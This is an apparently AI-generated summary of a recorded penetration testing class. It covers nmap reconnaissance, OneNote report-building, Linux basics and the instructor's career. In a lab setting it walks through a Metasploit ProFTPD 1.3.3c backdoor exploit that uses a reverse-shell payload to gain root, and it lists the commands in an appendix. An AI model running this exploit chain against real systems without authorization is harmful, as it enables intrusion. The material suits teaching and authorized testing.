Back to Recording

Summary

Overview

This session is a hands-on cybersecurity course focused on penetration testing using Kali Linux, covering network scanning, exploitation with Metasploit, enumeration, and documentation in OneNote. The instructor, Dr. Wesley Phillips, guides students through real-world attack workflows—such as identifying targets, scanning ports, exploiting vulnerabilities, and gaining root access—while emphasizing the importance of thorough documentation, ethical boundaries, and understanding the "why" behind each command. The course integrates practical tool usage, terminal navigation, and professional report-building, with frequent emphasis on portfolio development and real-world context over rote memorization.

Topic (Timeline)

1. Screen Sharing and Environment Setup [00:00:00 - 00:02:58]

The instructor troubleshoots screen-sharing issues during a live demo, ensuring students can follow along with Kali Linux and OneNote side-by-side.

  • The instructor repeatedly asks students to minimize competing windows (Zoom, desktop) to focus on the Kali terminal and OneNote.
  • Students are instructed to reconnect shared screens after timeouts and re-establish screen-sharing permissions.
  • Emphasis is placed on visual alignment: students must see both the terminal and OneNote simultaneously to follow steps accurately.
  • The instructor uses “split screen” as a core teaching method, requiring students to manage multiple open applications.

2. Exploitation Workflow: ProFTPD Exploit via Metasploit [00:05:26 - 00:12:09]

The instructor walks through a full exploitation chain targeting a vulnerable ProFTPD service on a test machine.

  • Students are instructed to launch msfconsole, search for proftpd 1.3.3c, and select exploit use 0.
  • Remote host (RHOSTS) is set to 10.0.3.16, and local host (LHOST) is configured to the Kali machine’s IP (10.0.3.15).
  • Payload cmd/unix/reverse is selected and executed, resulting in a shell.
  • Post-exploitation steps include running whoami (confirming root access) and navigating to /root.
  • The instructor stresses the need to verify each step visually and document outcomes in OneNote.

3. Screen Clipping and Documentation in OneNote [00:12:09 - 00:20:36]

The instructor teaches precise screen capture and cleanup techniques in OneNote to build a professional pen test report.

  • Students are guided to use OneNote’s “Screen Clipping” tool to capture terminal output without cropping.
  • Emphasis is placed on selecting the exact region—from top-left to bottom-right—without including extraneous UI elements.
  • Students are instructed to delete placeholder text (“Screen clipping taken on...”) using triple-click and delete.
  • Images are resized and aligned manually using corner handles, with strict rules on spacing and formatting.
  • The instructor insists on clean, minimal documentation: “I want you to look good.”

4. Network Discovery and Command Verification [00:20:42 - 00:25:55]

The instructor demonstrates how to capture and document network reconnaissance commands and outputs.

  • Students are required to capture the output of fping and nmap scans, ensuring full command-line context is visible.
  • The instructor insists on capturing the entire command line, not just the result, to prove execution.
  • Students are taught to use Ctrl+Shift++ to zoom terminal output for better clipping accuracy.
  • Multiple screen clippings are pasted sequentially in OneNote with deliberate spacing between them.
  • The instructor corrects over-capturing: “You copied that one twice. You only need one.”

5. Terminal Navigation and Process Management [02:38:25 - 02:45:32]

The instructor covers Linux system navigation, hidden files, process monitoring, and privilege escalation.

  • Hidden files are created with touch .dana.txt and revealed using ls -la.
  • File permissions are modified with chmod +x and removed with chmod -x to demonstrate exploitability.
  • Students learn to identify and kill processes using ps aux | grep apache2 and kill [PID] or kill -9.
  • Real-time monitoring tools (htop, atop) are introduced and installed via sudo apt install htop.
  • The instructor warns against leaving executable hidden files on systems—pen testers exploit them.

6. Pen Test Methodology and Professional Workflow [02:52:53 - 03:00:56]

The instructor outlines the foundational steps of a professional penetration test and ethical boundaries.

  • A pen test begins with booting Kali, identifying the target, obtaining written permission, and defining scope.
  • First command: ip a to check local IP; then sudo netdiscover to find targets on the network.
  • MAC address matching is used to confirm target identity.
  • Connectivity is verified with ping or fping, stopped with Ctrl+C.
  • The instructor stresses: “You don’t just run commands; you need to understand why you’re doing them.”

7. Advanced Scanning and Exploitation [02:00:39 - 02:28:38]

The instructor demonstrates comprehensive network scanning and exploitation techniques.

  • Basic scan: nmap 10.0.3.16 identifies open ports (21, 22, 80).
  • Aggressive scan: nmap -A 10.0.3.16 enables OS detection, version detection, and script scanning.
  • Full port scan: nmap -A -p- 10.0.3.16 scans all 65,535 ports; output is saved to nmap-scan.txt.
  • Exploit search: searchsploit proftpd 1.3.3c finds a known backdoor.
  • Metasploit is used to exploit the service, gain root shell, and navigate to /root.
  • SSH access to external targets (e.g., bandit0@bandit.labs.overthewire.org) is introduced as a foundational skill.

8. Tool Proficiency and Learning Strategy [01:44:13 - 01:47:50]

The instructor emphasizes self-directed learning, tool mastery, and real-world context.

  • Students are directed to Kali’s “Dragon” menu to explore categories: reconnaissance, privilege escalation, forensics, etc.
  • Learning must be done by building walkthroughs on vulnerable machines—not just watching.
  • ChatGPT is recommended as a learning aid: “Show me real examples to manage and kill Linux processes.”
  • Tools like rig (for generating fake identities) and btop (for resource monitoring) are introduced as research-level knowledge.
  • The instructor states: “Kali only pushes vetted software through the Linux Foundation—no malware, no bugs.”

9. Professional Context and Ethical Framework [01:47:50 - 01:50:23]

The instructor shifts focus from technical steps to professional practice and governance.

  • Pen testers must understand rules of engagement, timelines, budget, and stress factors—not just commands.
  • Students are instructed to bold “objective” and “written permission” in OneNote as non-negotiable prerequisites.
  • The instructor refuses to give step-by-step incident response guides: “I expect you to think your way through.”
  • Documentation is framed as a legal and professional requirement, not an administrative task.

10. Instructor Background and Teaching Philosophy [03:03:50 - 03:23:53]

The instructor shares his professional background to contextualize the course’s rigor and real-world relevance.

  • Served in U.S. Marine Corps communications, NSA technical surveillance, and law enforcement.
  • Led cybersecurity teams of 200+; managed insider threat programs at DISA; remediated SolarWinds breach.
  • Developed and deployed enterprise security tools (Splunk SOAR) through bureaucratic resistance.
  • Trained SOC analysts in GRC; achieved ATO for four systems in high-risk environments.
  • Believes in co-creation, documentation, and proving value to leadership—not just technical skill.
  • Rejects resume inflation: “Don’t put course badges on your resume as certifications.”

Appendix

Key Concepts

  • Penetration testing requires written permission and defined scope before any activity.
  • Documentation in OneNote is a professional deliverable, not an afterthought.
  • Understanding the purpose of each command is more important than memorizing syntax.
  • Hidden files (starting with .) are critical in both defense and offense.
  • Network reconnaissance must include MAC address matching to confirm target identity.
  • Exploitation workflows follow: scan → identify → exploit → gain access → document.
  • Kali Linux tools are vetted and safe; no malware is distributed through official channels.

Tools & Commands

  • ip a – View local network interfaces
  • sudo netdiscover – Discover live hosts on network
  • ping / fping – Test connectivity
  • nmap 10.0.3.16 – Scan top 1000 ports
  • nmap -A 10.0.3.16 – Aggressive scan (OS, version, scripts)
  • nmap -A -p- 10.0.3.16 > nmap-scan.txt – Full port scan with output save
  • searchsploit proftpd 1.3.3c – Find known exploits
  • msfconsole – Launch Metasploit Framework
  • use 0 – Select exploit
  • set RHOSTS 10.0.3.16 – Set target IP
  • set LHOST 10.0.3.15 – Set attacker IP
  • set payload cmd/unix/reverse – Choose reverse shell payload
  • exploit – Execute exploit
  • whoami – Confirm user privileges
  • cd /root – Navigate to root directory
  • ls -la – List all files including hidden
  • touch .filename – Create hidden file
  • chmod +x .filename – Make file executable
  • ps aux | grep apache2 – Find running process
  • kill [PID] – Terminate process
  • htop / btop – Real-time system monitoring
  • man rig – View documentation for identity generation tool
  • head -10 /etc/passwd – View first 10 users
  • tail / wc -l – View end of file / count lines
  • history – View command history
  • ssh username@host -p port – Remote access via SSH